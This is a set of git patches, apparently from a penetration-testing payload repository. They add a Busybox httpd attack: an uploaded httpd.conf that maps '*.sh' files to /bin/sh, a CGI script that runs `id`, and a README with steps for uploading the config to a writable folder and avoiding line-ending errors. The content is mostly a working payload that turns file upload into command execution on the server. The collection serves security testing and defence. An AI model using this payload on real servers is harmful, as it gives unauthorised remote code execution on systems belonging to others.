From 1e4e04831b0e0a458dbec42cc2fe22824c71d7fd Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 13 Dec 2018 23:56:10 +0000 Subject: [PATCH 1/4] Create httpd.conf --- Upload insecure files/Busybox httpd.conf/httpd.conf | 1 + 1 file changed, 1 insertion(+) create mode 100644 Upload insecure files/Busybox httpd.conf/httpd.conf diff --git a/Upload insecure files/Busybox httpd.conf/httpd.conf b/Upload insecure files/Busybox httpd.conf/httpd.conf new file mode 100644 index 0000000..652c80e --- /dev/null +++ b/Upload insecure files/Busybox httpd.conf/httpd.conf @@ -0,0 +1 @@ +*.cool:/bin/sh From f1fec1c9524da6c87075bc83a0422e691f6fef1f Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Thu, 13 Dec 2018 23:58:24 +0000 Subject: [PATCH 2/4] Create shellymcshellface.sh --- Upload insecure files/Busybox httpd.conf/shellymcshellface.sh | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 Upload insecure files/Busybox httpd.conf/shellymcshellface.sh diff --git a/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh b/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh new file mode 100644 index 0000000..0282e4b --- /dev/null +++ b/Upload insecure files/Busybox httpd.conf/shellymcshellface.sh @@ -0,0 +1,3 @@ +echo "Content-type: text/html" +echo "" +echo `id` From 1d6b34ace59266fab7d7d2946ea1c918e03babd6 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Fri, 14 Dec 2018 00:02:58 +0000 Subject: [PATCH 3/4] Create README.md --- Upload insecure files/Busybox httpd.conf/README.md | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 Upload insecure files/Busybox httpd.conf/README.md diff --git a/Upload insecure files/Busybox httpd.conf/README.md b/Upload insecure files/Busybox httpd.conf/README.md new file mode 100644 index 0000000..67f71a6 --- /dev/null +++ b/Upload insecure files/Busybox httpd.conf/README.md @@ -0,0 +1,11 @@ +If you have upload access to a non /cgi-bin folder - upload a httpd.conf and configure your own interpreter. + +Details from Busybox httpd.c + +https://github.com/brgl/busybox/blob/abbf17abccbf832365d9acf1c280369ba7d5f8b2/networking/httpd.c#L60 + +> *.php:/path/php # run xxx.php through an interpreter` + +> If a sub directory contains config file, it is parsed and merged with any existing settings as if it was appended to the original configuration. + +Watch out for Windows CRLF line endings messing up your payload (you will just get 404 errors) - you cant see these in Burp :) From 20c6bb22998b4903bc1b6783f60c91ced207215f Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Fri, 14 Dec 2018 00:03:50 +0000 Subject: [PATCH 4/4] Update httpd.conf --- Upload insecure files/Busybox httpd.conf/httpd.conf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Upload insecure files/Busybox httpd.conf/httpd.conf b/Upload insecure files/Busybox httpd.conf/httpd.conf index 652c80e..da4bd65 100644 --- a/Upload insecure files/Busybox httpd.conf/httpd.conf +++ b/Upload insecure files/Busybox httpd.conf/httpd.conf @@ -1 +1 @@ -*.cool:/bin/sh +*.sh:/bin/sh